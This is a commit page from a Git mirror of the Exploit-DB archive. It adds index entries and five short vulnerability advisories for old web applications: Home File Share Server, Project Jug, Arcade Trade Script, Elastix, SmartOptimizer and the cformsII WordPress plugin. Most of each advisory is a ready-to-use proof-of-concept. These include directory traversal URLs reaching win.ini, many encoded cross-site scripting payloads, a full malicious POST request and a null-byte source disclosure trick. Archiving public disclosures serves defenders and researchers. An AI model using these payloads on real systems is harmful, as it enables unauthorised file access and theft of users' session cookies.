bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

Updated 10_14_2014

Browse source
This commit is contained in:
Offensive Security 2014-10-14 04:50:20 +00:00
parent 60e5c6c2a0
commit 68d833b397
7 changed files with 122 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
files.csv
View file

@ -31462,3 +31462,9 @@ id,file,description,date,author,platform,type,port
34938,platforms/windows/dos/34938.txt,"Teamspeak 2.0.32.60 Memory Corruption Vulnerability",2010-10-28,"Jokaim and nSense",windows,dos,0
34939,platforms/php/webapps/34939.txt,"W-Agora 4.1.5 Local File Include and Cross Site Scripting Vulnerabilities",2010-10-27,MustLive,php,webapps,0
34940,platforms/php/webapps/34940.txt,"212cafe WebBoard 2.90 beta 'view.php' Directory Traversal Vulnerability",2009-05-29,MrDoug,php,webapps,0
34941,platforms/php/webapps/34941.txt,"Intergo Arcade Trade Script 1.0 'q' Parameter Cross Site Scripting Vulnerability",2009-05-25,SmOk3,php,webapps,0
34942,platforms/php/webapps/34942.txt,"Elastix 2.0.2 Multiple Cross Site Scripting Vulnerabilities",2010-11-01,"dave b",php,webapps,0
34943,platforms/windows/remote/34943.txt,"Project Jug 1.0.0 Directory Traversal Vulnerability",2010-11-01,"John Leitch",windows,remote,0
34944,platforms/php/webapps/34944.txt,"SmartOptimizer Null Character Remote Information Disclosure Vulnerability",2010-11-01,"Francois Harvey",php,webapps,0
34945,platforms/multiple/remote/34945.txt,"Home File Share Server 0.7.2 32 Directory Traversal Vulnerability",2010-11-01,"John Leitch",multiple,remote,0
34946,platforms/php/webapps/34946.txt,"cformsII 11.5/ 13.1 Plugin for WordPress 'lib_ajax.php' Multiple Cross Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0

Can't render this file because it is too large.

9
platforms/multiple/remote/34945.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/44580/info
Home File Share Server is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
Home File Share Server 0.7.2.32 is vulnerable; other versions may also be affected.
http://www.example.com/RealFolder/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F

9
platforms/php/webapps/34941.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/44555/info
Arcade Trade Script is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Arcade Trade Script 1.0 beta is vulnerable; other versions may also be affected.
http://www.example.com/index.php?a=gamelist&q=[XSS]&submit=GO

21
platforms/php/webapps/34942.txt Executable file
View file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/44565/info
Elastix is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Elastix 2.0.2 is vulnerable; other versions may also be affected.
https://www.example.com/index.php?menu=packages&nombre_paquete=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&submitInstalado=installed&submit_nombre=Search
https://www.example.com/?menu=pbxconfig&display=recordings&Submit=Go&display=recordings&usersnum=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
https://www.example.com/index.php?menu=cdrreport&date_end=28%20Oct%202010&date_start=28%20Oct%202010&field_name=dst&field_pattern=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&filter=Filter&status=ALL
https://www.example.com/index.php?menu=asterisk_log&filter=2010-10-28&offset=0&busqueda=&ultima_busqueda=&ultimo_offset=&&busqueda=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&filter=2010-10-28&offset=0&show=Show&ultima_busqueda=&ultimo_offset=
https://www.example.com/index.php?menu=summary_by_extension&option_fil=&value_fil=&date_from=28&date_from=28%20Oct%202010&date_to=28%20Oct%202010&option_fil=Ext&show=Show&value_fil=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
https://www.example.com/index.php?menu=grouplist&action=view&id=1%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
https://www.example.com/index.php?menu=group_permission&filter_group=1&filter_resource=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

9
platforms/php/webapps/34944.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/44578/info
SmartOptimizer is prone to a remote information-disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view the source code of files in the context of the server process; this may aid in further attacks.
SmartOptimizer 1.7 is vulnerable; prior versions may also be affected.
http://www.example.com/smartoptimizer/index.php?../index.php%00.js

59
platforms/php/webapps/34946.txt Executable file
View file

@ -0,0 +1,59 @@
source: http://www.securityfocus.com/bid/44587/info
The cformsII plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
cformsII 13.1 is vulnerable; other versions may also be affected.
Request:
http://www.example.com/wp-content/plugins/cforms/lib_ajax.php
POST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:
1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 219
Cookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do
%26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce
%26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do
%26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765;
c o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8 2 3 8 8 f 6 = t e s t ;
comment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam
%40checkpoint.com
Pragma: no-cache
Cache-Control: no-cache
rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#
$<script>alert(1)</script>$#$rbranco_nospam@checkpoint.com$#$http://
www.checkpoint.com$#$<script>alert(1)</script>

9
platforms/windows/remote/34943.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/44569/info
Project Jug is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to read files outside the webroot directory. Information harvested may aid in launching further attacks.
Project Jug 1.0.0.0 is vulnerable; other versions may also be affected.
http://www.example.com/.../.../.../.../.../.../.../.../.../.../windows/win.ini